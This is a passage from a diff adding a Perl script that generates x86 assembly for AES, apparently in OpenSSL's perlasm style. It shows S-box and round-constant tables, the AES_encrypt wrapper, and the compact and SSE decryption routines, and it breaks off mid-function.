+	&_data_word(0xbb6969d2, 0x70d9d9a9, 0x898e8e07, 0xa7949433);
+	&_data_word(0xb69b9b2d, 0x221e1e3c, 0x92878715, 0x20e9e9c9);
+	&_data_word(0x49cece87, 0xff5555aa, 0x78282850, 0x7adfdfa5);
+	&_data_word(0x8f8c8c03, 0xf8a1a159, 0x80898909, 0x170d0d1a);
+	&_data_word(0xdabfbf65, 0x31e6e6d7, 0xc6424284, 0xb86868d0);
+	&_data_word(0xc3414182, 0xb0999929, 0x772d2d5a, 0x110f0f1e);
+	&_data_word(0xcbb0b07b, 0xfc5454a8, 0xd6bbbb6d, 0x3a16162c);
+
+#Te4	# four copies of Te4 to choose from to avoid L1 aliasing
+	&data_byte(0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5);
+	&data_byte(0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76);
+	&data_byte(0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0);
+	&data_byte(0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0);
+	&data_byte(0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc);
+	&data_byte(0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15);
+	&data_byte(0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a);
+	&data_byte(0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75);
+	&data_byte(0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0);
+	&data_byte(0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84);
+	&data_byte(0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b);
+	&data_byte(0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf);
+	&data_byte(0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85);
+	&data_byte(0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8);
+	&data_byte(0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5);
+	&data_byte(0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2);
+	&data_byte(0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17);
+	&data_byte(0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73);
+	&data_byte(0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88);
+	&data_byte(0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb);
+	&data_byte(0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c);
+	&data_byte(0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79);
+	&data_byte(0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9);
+	&data_byte(0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08);
+	&data_byte(0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6);
+	&data_byte(0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a);
+	&data_byte(0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e);
+	&data_byte(0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e);
+	&data_byte(0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94);
+	&data_byte(0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf);
+	&data_byte(0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68);
+	&data_byte(0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16);
+
+	&data_byte(0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5);
+	&data_byte(0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76);
+	&data_byte(0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0);
+	&data_byte(0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0);
+	&data_byte(0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc);
+	&data_byte(0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15);
+	&data_byte(0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a);
+	&data_byte(0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75);
+	&data_byte(0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0);
+	&data_byte(0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84);
+	&data_byte(0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b);
+	&data_byte(0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf);
+	&data_byte(0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85);
+	&data_byte(0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8);
+	&data_byte(0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5);
+	&data_byte(0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2);
+	&data_byte(0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17);
+	&data_byte(0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73);
+	&data_byte(0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88);
+	&data_byte(0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb);
+	&data_byte(0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c);
+	&data_byte(0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79);
+	&data_byte(0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9);
+	&data_byte(0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08);
+	&data_byte(0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6);
+	&data_byte(0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a);
+	&data_byte(0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e);
+	&data_byte(0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e);
+	&data_byte(0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94);
+	&data_byte(0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf);
+	&data_byte(0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68);
+	&data_byte(0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16);
+
+	&data_byte(0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5);
+	&data_byte(0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76);
+	&data_byte(0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0);
+	&data_byte(0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0);
+	&data_byte(0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc);
+	&data_byte(0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15);
+	&data_byte(0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a);
+	&data_byte(0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75);
+	&data_byte(0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0);
+	&data_byte(0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84);
+	&data_byte(0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b);
+	&data_byte(0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf);
+	&data_byte(0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85);
+	&data_byte(0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8);
+	&data_byte(0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5);
+	&data_byte(0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2);
+	&data_byte(0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17);
+	&data_byte(0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73);
+	&data_byte(0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88);
+	&data_byte(0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb);
+	&data_byte(0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c);
+	&data_byte(0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79);
+	&data_byte(0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9);
+	&data_byte(0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08);
+	&data_byte(0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6);
+	&data_byte(0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a);
+	&data_byte(0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e);
+	&data_byte(0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e);
+	&data_byte(0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94);
+	&data_byte(0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf);
+	&data_byte(0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68);
+	&data_byte(0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16);
+
+	&data_byte(0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5);
+	&data_byte(0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76);
+	&data_byte(0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0);
+	&data_byte(0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0);
+	&data_byte(0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc);
+	&data_byte(0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15);
+	&data_byte(0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a);
+	&data_byte(0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75);
+	&data_byte(0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0);
+	&data_byte(0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84);
+	&data_byte(0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b);
+	&data_byte(0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf);
+	&data_byte(0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85);
+	&data_byte(0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8);
+	&data_byte(0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5);
+	&data_byte(0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2);
+	&data_byte(0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17);
+	&data_byte(0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73);
+	&data_byte(0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88);
+	&data_byte(0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb);
+	&data_byte(0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c);
+	&data_byte(0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79);
+	&data_byte(0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9);
+	&data_byte(0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08);
+	&data_byte(0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6);
+	&data_byte(0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a);
+	&data_byte(0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e);
+	&data_byte(0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e);
+	&data_byte(0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94);
+	&data_byte(0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf);
+	&data_byte(0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68);
+	&data_byte(0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16);
+#rcon:
+	&data_word(0x00000001, 0x00000002, 0x00000004, 0x00000008);
+	&data_word(0x00000010, 0x00000020, 0x00000040, 0x00000080);
+	&data_word(0x0000001b, 0x00000036, 0x00000000, 0x00000000);
+	&data_word(0x00000000, 0x00000000, 0x00000000, 0x00000000);
+&function_end_B("_x86_AES_encrypt");
+
+# void AES_encrypt (const void *inp,void *out,const AES_KEY *key);
+&function_begin("AES_encrypt");
+	&mov	($acc,&wparam(0));		# load inp
+	&mov	($key,&wparam(2));		# load key
+
+	&mov	($s0,"esp");
+	&sub	("esp",36);
+	&and	("esp",-64);			# align to cache-line
+
+	# place stack frame just "above" the key schedule
+	&lea	($s1,&DWP(-64-63,$key));
+	&sub	($s1,"esp");
+	&neg	($s1);
+	&and	($s1,0x3C0);	# modulo 1024, but aligned to cache-line
+	&sub	("esp",$s1);
+	&add	("esp",4);	# 4 is reserved for caller's return address
+	&mov	($_esp,$s0);			# save stack pointer
+
+	&call   (&label("pic_point"));          # make it PIC!
+	&set_label("pic_point");
+	&blindpop($tbl);
+	&picmeup($s0,"OPENSSL_ia32cap_P",$tbl,&label("pic_point")) if (!$x86only);
+	&lea    ($tbl,&DWP(&label("AES_Te")."-".&label("pic_point"),$tbl));
+
+	# pick Te4 copy which can't "overlap" with stack frame or key schedule
+	&lea	($s1,&DWP(768-4,"esp"));
+	&sub	($s1,$tbl);
+	&and	($s1,0x300);
+	&lea	($tbl,&DWP(2048+128,$tbl,$s1));
+
+					if (!$x86only) {
+	&bt	(&DWP(0,$s0),25);	# check for SSE bit
+	&jnc	(&label("x86"));
+
+	&movq	("mm0",&QWP(0,$acc));
+	&movq	("mm4",&QWP(8,$acc));
+	&call	("_sse_AES_encrypt_compact");
+	&mov	("esp",$_esp);			# restore stack pointer
+	&mov	($acc,&wparam(1));		# load out
+	&movq	(&QWP(0,$acc),"mm0");		# write output data
+	&movq	(&QWP(8,$acc),"mm4");
+	&emms	();
+	&function_end_A();
+					}
+	&set_label("x86",16);
+	&mov	($_tbl,$tbl);
+	&mov	($s0,&DWP(0,$acc));		# load input data
+	&mov	($s1,&DWP(4,$acc));
+	&mov	($s2,&DWP(8,$acc));
+	&mov	($s3,&DWP(12,$acc));
+	&call	("_x86_AES_encrypt_compact");
+	&mov	("esp",$_esp);			# restore stack pointer
+	&mov	($acc,&wparam(1));		# load out
+	&mov	(&DWP(0,$acc),$s0);		# write output data
+	&mov	(&DWP(4,$acc),$s1);
+	&mov	(&DWP(8,$acc),$s2);
+	&mov	(&DWP(12,$acc),$s3);
+&function_end("AES_encrypt");
+
+#--------------------------------------------------------------------#
+
+######################################################################
+# "Compact" block function
+######################################################################
+
+sub deccompact()
+{ my $Fn = \&mov;
+  while ($#_>5) { pop(@_); $Fn=sub{}; }
+  my ($i,$td,@s)=@_;
+  my $tmp = $key;
+  my $out = $i==3?$s[0]:$acc;
+
+	# $Fn is used in first compact round and its purpose is to
+	# void restoration of some values from stack, so that after
+	# 4xdeccompact with extra argument $key, $s0 and $s1 values
+	# are left there...
+	if($i==3)   {	&$Fn	($key,$__key);			}
+	else        {	&mov	($out,$s[0]);			}
+			&and	($out,0xFF);
+			&movz	($out,&BP(-128,$td,$out,1));
+
+	if ($i==3)  {	$tmp=$s[1];				}
+			&movz	($tmp,&HB($s[1]));
+			&movz	($tmp,&BP(-128,$td,$tmp,1));
+			&shl	($tmp,8);
+			&xor	($out,$tmp);
+
+	if ($i==3)  {	$tmp=$s[2]; &mov ($s[1],$acc);		}
+	else        {	mov	($tmp,$s[2]);			}
+			&shr	($tmp,16);
+			&and	($tmp,0xFF);
+			&movz	($tmp,&BP(-128,$td,$tmp,1));
+			&shl	($tmp,16);
+			&xor	($out,$tmp);
+
+	if ($i==3)  {	$tmp=$s[3]; &$Fn ($s[2],$__s1);		}
+	else        {	&mov	($tmp,$s[3]);			}
+			&shr	($tmp,24);
+			&movz	($tmp,&BP(-128,$td,$tmp,1));
+			&shl	($tmp,24);
+			&xor	($out,$tmp);
+	if ($i<2)   {	&mov	(&DWP(4+4*$i,"esp"),$out);	}
+	if ($i==3)  {	&$Fn	($s[3],$__s0);			}
+}
+
+# must be called with 2,3,0,1 as argument sequence!!!
+sub dectransform()
+{ my @s = ($s0,$s1,$s2,$s3);
+  my $i = shift;
+  my $tmp = $key;
+  my $tp2 = @s[($i+2)%4]; $tp2 = @s[2] if ($i==1);
+  my $tp4 = @s[($i+3)%4]; $tp4 = @s[3] if ($i==1);
+  my $tp8 = $tbl;
+
+	&mov	($tmp,0x80808080);
+	&and	($tmp,$s[$i]);
+	&mov	($acc,$tmp);
+	&shr	($tmp,7);
+	&lea	($tp2,&DWP(0,$s[$i],$s[$i]));
+	&sub	($acc,$tmp);
+	&and	($tp2,0xfefefefe);
+	&and	($acc,0x1b1b1b1b);
+	&xor	($tp2,$acc);
+	&mov	($tmp,0x80808080);
+
+	&and	($tmp,$tp2);
+	&mov	($acc,$tmp);
+	&shr	($tmp,7);
+	&lea	($tp4,&DWP(0,$tp2,$tp2));
+	&sub	($acc,$tmp);
+	&and	($tp4,0xfefefefe);
+	&and	($acc,0x1b1b1b1b);
+	 &xor	($tp2,$s[$i]);	# tp2^tp1
+	&xor	($tp4,$acc);
+	&mov	($tmp,0x80808080);
+
+	&and	($tmp,$tp4);
+	&mov	($acc,$tmp);
+	&shr	($tmp,7);
+	&lea	($tp8,&DWP(0,$tp4,$tp4));
+	&sub	($acc,$tmp);
+	&and	($tp8,0xfefefefe);
+	&and	($acc,0x1b1b1b1b);
+	 &xor	($tp4,$s[$i]);	# tp4^tp1
+	 &rotl	($s[$i],8);	# = ROTATE(tp1,8)
+	&xor	($tp8,$acc);
+
+	&xor	($s[$i],$tp2);
+	&xor	($tp2,$tp8);
+	&xor	($s[$i],$tp4);
+	&xor	($tp4,$tp8);
+	&rotl	($tp2,24);
+	&xor	($s[$i],$tp8);	# ^= tp8^(tp4^tp1)^(tp2^tp1)
+	&rotl	($tp4,16);
+	&xor	($s[$i],$tp2);	# ^= ROTATE(tp8^tp2^tp1,24)
+	&rotl	($tp8,8);
+	&xor	($s[$i],$tp4);	# ^= ROTATE(tp8^tp4^tp1,16)
+	 &mov	($s[0],$__s0)			if($i==2); #prefetch $s0
+	 &mov	($s[1],$__s1)			if($i==3); #prefetch $s1
+	 &mov	($s[2],$__s2)			if($i==1);
+	&xor	($s[$i],$tp8);	# ^= ROTATE(tp8,8)
+
+	&mov	($s[3],$__s3)			if($i==1);
+	&mov	(&DWP(4+4*$i,"esp"),$s[$i])	if($i>=2);
+}
+
+&function_begin_B("_x86_AES_decrypt_compact");
+	# note that caller is expected to allocate stack frame for me!
+	&mov	($__key,$key);			# save key
+
+	&xor	($s0,&DWP(0,$key));		# xor with key
+	&xor	($s1,&DWP(4,$key));
+	&xor	($s2,&DWP(8,$key));
+	&xor	($s3,&DWP(12,$key));
+
+	&mov	($acc,&DWP(240,$key));		# load key->rounds
+
+	&lea	($acc,&DWP(-2,$acc,$acc));
+	&lea	($acc,&DWP(0,$key,$acc,8));
+	&mov	($__end,$acc);			# end of key schedule
+
+	# prefetch Td4
+	&mov	($key,&DWP(0-128,$tbl));
+	&mov	($acc,&DWP(32-128,$tbl));
+	&mov	($key,&DWP(64-128,$tbl));
+	&mov	($acc,&DWP(96-128,$tbl));
+	&mov	($key,&DWP(128-128,$tbl));
+	&mov	($acc,&DWP(160-128,$tbl));
+	&mov	($key,&DWP(192-128,$tbl));
+	&mov	($acc,&DWP(224-128,$tbl));
+
+	&set_label("loop",16);
+
+		&deccompact(0,$tbl,$s0,$s3,$s2,$s1,1);
+		&deccompact(1,$tbl,$s1,$s0,$s3,$s2,1);
+		&deccompact(2,$tbl,$s2,$s1,$s0,$s3,1);
+		&deccompact(3,$tbl,$s3,$s2,$s1,$s0,1);
+		&dectransform(2);
+		&dectransform(3);
+		&dectransform(0);
+		&dectransform(1);
+		&mov 	($key,$__key);
+		&mov	($tbl,$__tbl);
+		&add	($key,16);		# advance rd_key
+		&xor	($s0,&DWP(0,$key));
+		&xor	($s1,&DWP(4,$key));
+		&xor	($s2,&DWP(8,$key));
+		&xor	($s3,&DWP(12,$key));
+
+	&cmp	($key,$__end);
+	&mov	($__key,$key);
+	&jb	(&label("loop"));
+
+	&deccompact(0,$tbl,$s0,$s3,$s2,$s1);
+	&deccompact(1,$tbl,$s1,$s0,$s3,$s2);
+	&deccompact(2,$tbl,$s2,$s1,$s0,$s3);
+	&deccompact(3,$tbl,$s3,$s2,$s1,$s0);
+
+	&xor	($s0,&DWP(16,$key));
+	&xor	($s1,&DWP(20,$key));
+	&xor	($s2,&DWP(24,$key));
+	&xor	($s3,&DWP(28,$key));
+
+	&ret	();
+&function_end_B("_x86_AES_decrypt_compact");
+
+######################################################################
+# "Compact" SSE block function.
+######################################################################
+
+sub sse_deccompact()
+{
+	&pshufw	("mm1","mm0",0x0c);		#  7, 6, 1, 0
+	&pshufw	("mm5","mm4",0x09);		# 13,12,11,10
+	&movd	("eax","mm1");			#  7, 6, 1, 0
+	&movd	("ebx","mm5");			# 13,12,11,10
+	&mov	($__key,$key);
+
+	&movz	($acc,&LB("eax"));		#  0
+	&movz	("edx",&HB("eax"));		#  1
+	&pshufw	("mm2","mm0",0x06);		#  3, 2, 5, 4
+	&movz	("ecx",&BP(-128,$tbl,$acc,1));	#  0
+	&movz	($key,&LB("ebx"));		# 10
+	&movz	("edx",&BP(-128,$tbl,"edx",1));	#  1
+	&shr	("eax",16);			#  7, 6
+	&shl	("edx",8);			#  1
+
+	&movz	($acc,&BP(-128,$tbl,$key,1));	# 10
+	&movz	($key,&HB("ebx"));		# 11
+	&shl	($acc,16);			# 10
+	&pshufw	("mm6","mm4",0x03);		# 9, 8,15,14
+	&or	("ecx",$acc);			# 10
+	&movz	($acc,&BP(-128,$tbl,$key,1));	# 11
+	&movz	($key,&HB("eax"));		#  7
+	&shl	($acc,24);			# 11
+	&shr	("ebx",16);			# 13,12
+	&or	("edx",$acc);			# 11
+
+	&movz	($acc,&BP(-128,$tbl,$key,1));	#  7
+	&movz	($key,&HB("ebx"));		# 13
+	&shl	($acc,24);			#  7
+	&or	("ecx",$acc);			#  7
+	&movz	($acc,&BP(-128,$tbl,$key,1));	# 13
+	&movz	($key,&LB("eax"));		#  6
+	&shl	($acc,8);			# 13
+	&movd	("eax","mm2");			#  3, 2, 5, 4
+	&or	("ecx",$acc);			# 13
+
+	&movz	($acc,&BP(-128,$tbl,$key,1));	#  6
+	&movz	($key,&LB("ebx"));		# 12
+	&shl	($acc,16);			#  6
+	&movd	("ebx","mm6");			#  9, 8,15,14
+	&movd	("mm0","ecx");			# t[0] collected
+	&movz	("ecx",&BP(-128,$tbl,$key,1));	# 12
+	&movz	($key,&LB("eax"));		#  4
+	&or	("ecx",$acc);			# 12
+
+	&movz	($acc,&BP(-128,$tbl,$key,1));	#  4
+	&movz	($key,&LB("ebx"));		# 14
+	&or	("edx",$acc);			#  4
+	&movz	($acc,&BP(-128,$tbl,$key,1));	# 14
+	&movz	($key,&HB("eax"));		#  5
+	&shl	($acc,16);			# 14
+	&shr	("eax",16);			#  3, 2
+	&or	("edx",$acc);			# 14
+
+	&movz	($acc,&BP(-128,$tbl,$key,1));	#  5
+	&movz	($key,&HB("ebx"));		# 15
+	&shr	("ebx",16);			#  9, 8
+	&shl	($acc,8);			#  5
+	&movd	("mm1","edx");			# t[1] collected
+	&movz	("edx",&BP(-128,$tbl,$key,1));	# 15
+	&movz	($key,&HB("ebx"));		#  9
+	&shl	("edx",24);			# 15
+	&and	("ebx",0xff);			#  8
+	&or	("edx",$acc);			# 15
+
+	&punpckldq	("mm0","mm1");		# t[0,1] collected
+
+	&movz	($acc,&BP(-128,$tbl,$key,1));	#  9
+	&movz	($key,&LB("eax"));		#  2
+	&shl	($acc,8);			#  9
+	&movz	("eax",&HB("eax"));		#  3
+	&movz	("ebx",&BP(-128,$tbl,"ebx",1));	#  8
+	&or	("ecx",$acc);			#  9
+	&movz	($acc,&BP(-128,$tbl,$key,1));	#  2
+	&or	("edx","ebx");			#  8
+	&shl	($acc,16);			#  2
+	&movz	("eax",&BP(-128,$tbl,"eax",1));	#  3
+	&or	("edx",$acc);			#  2
+	&shl	("eax",24);			#  3
+	&or	("ecx","eax");			#  3
+	&mov	($key,$__key);
+	&movd	("mm4","edx");			# t[2] collected
+	&movd	("mm5","ecx");			# t[3] collected
+
+	&punpckldq	("mm4","mm5");		# t[2,3] collected
+}
+
+					if (!$x86only) {
+&function_begin_B("_sse_AES_decrypt_compact");
+	&pxor	("mm0",&QWP(0,$key));	#  7, 6, 5, 4, 3, 2, 1, 0
+	&pxor	("mm4",&QWP(8,$key));	# 15,14,13,12,11,10, 9, 8
+
+	# note that caller is expected to allocate stack frame for me!
+	&mov	($acc,&DWP(240,$key));		# load key->rounds
+	&lea	($acc,&DWP(-2,$acc,$acc));
+	&lea	($acc,&DWP(0,$key,$acc,8));
+	&mov	($__end,$acc);			# end of key schedule
+
+	&mov	($s0,0x1b1b1b1b);		# magic constant
+	&mov	(&DWP(8,"esp"),$s0);
+	&mov	(&DWP(12,"esp"),$s0);
+
+	# prefetch Td4
+	&mov	($s0,&DWP(0-128,$tbl));
+	&mov	($s1,&DWP(32-128,$tbl));
+	&mov	($s2,&DWP(64-128,$tbl));
+	&mov	($s3,&DWP(96-128,$tbl));
+	&mov	($s0,&DWP(128-128,$tbl));
+	&mov	($s1,&DWP(160-128,$tbl));
+	&mov	($s2,&DWP(192-128,$tbl));
+	&mov	($s3,&DWP(224-128,$tbl));
+
+	&set_label("loop",16);
+		&sse_deccompact();
+		&add	($key,16);
+		&cmp	($key,$__end);
+		&ja	(&label("out"));
+
+		# ROTATE(x^y,N) == ROTATE(x,N)^ROTATE(y,N)
+		&movq	("mm3","mm0");		&movq	("mm7","mm4");
+		&movq	("mm2","mm0",1);	&movq	("mm6","mm4",1);
+		&movq	("mm1","mm0");		&movq	("mm5","mm4");
+		&pshufw	("mm0","mm0",0xb1);	&pshufw	("mm4","mm4",0xb1);# = ROTATE(tp0,16)
+		&pslld	("mm2",8);		&pslld	("mm6",8);
+		&psrld	("mm3",8);		&psrld	("mm7",8);
+		&pxor	("mm0","mm2");		&pxor	("mm4","mm6");	# ^= tp0<<8
+		&pxor	("mm0","mm3");		&pxor	("mm4","mm7");	# ^= tp0>>8
+		&pslld	("mm2",16);		&pslld	("mm6",16);
+		&psrld	("mm3",16);		&psrld	("mm7",16);
+		&pxor	("mm0","mm2");		&pxor	("mm4","mm6");	# ^= tp0<<24
+		&pxor	("mm0","mm3");		&pxor	("mm4","mm7");	# ^= tp0>>24
+
+		&movq	("mm3",&QWP(8,"esp"));
+		&pxor	("mm2","mm2");		&pxor	("mm6","mm6");
+		&pcmpgtb("mm2","mm1");		&pcmpgtb("mm6","mm5");
+		&pand	("mm2","mm3");		&pand	("mm6","mm3");
+		&paddb	("mm1","mm1");		&paddb	("mm5","mm5");
+		&pxor	("mm1","mm2");		&pxor	("mm5","mm6");	# tp2
+		&movq	("mm3","mm1");		&movq	("mm7","mm5");
+		&movq	("mm2","mm1");		&movq	("mm6","mm5");
+		&pxor	("mm0","mm1");		&pxor	("mm4","mm5");	# ^= tp2
+		&pslld	("mm3",24);		&pslld	("mm7",24);
+		&psrld	("mm2",8);		&psrld	("mm6",8);
+		&pxor	("mm0","mm3");		&pxor	("mm4","mm7");	# ^= tp2<<24
+		&pxor	("mm0","mm2");		&pxor	("mm4","mm6");	# ^= tp2>>8
+
+		&movq	("mm2",&QWP(8,"esp"));
+		&pxor	("mm3","mm3");		&pxor	("mm7","mm7");
+		&pcmpgtb("mm3","mm1");		&pcmpgtb("mm7","mm5");
